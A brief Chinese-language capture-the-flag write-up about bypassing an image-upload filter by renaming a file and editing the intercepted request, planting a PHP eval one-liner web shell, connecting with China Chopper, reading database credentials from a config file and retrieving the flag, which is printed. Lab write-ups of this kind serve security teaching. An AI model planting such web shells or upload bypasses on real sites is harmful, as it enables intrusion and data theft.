上传绕过,菜刀连接数据库
题目描述
解题思路
写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话:
<?php @eval($_POST['caidao']);?>上传,抓包
jpg改为php,GOGOGO发包
得到上传路径,用菜刀链接
进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码
菜刀连接,配置一下
<T>MYSQL</T>
<H>localhost</H>
<U>ctf</U>
<P>ctfctfctf</P>
右键数据库管理,拿flag
得到FLAG
直接双击flag没有回显,改一下查询命令即可
flag{8ec2465a-86fc-4513-8e66-1b8cce1958e0}
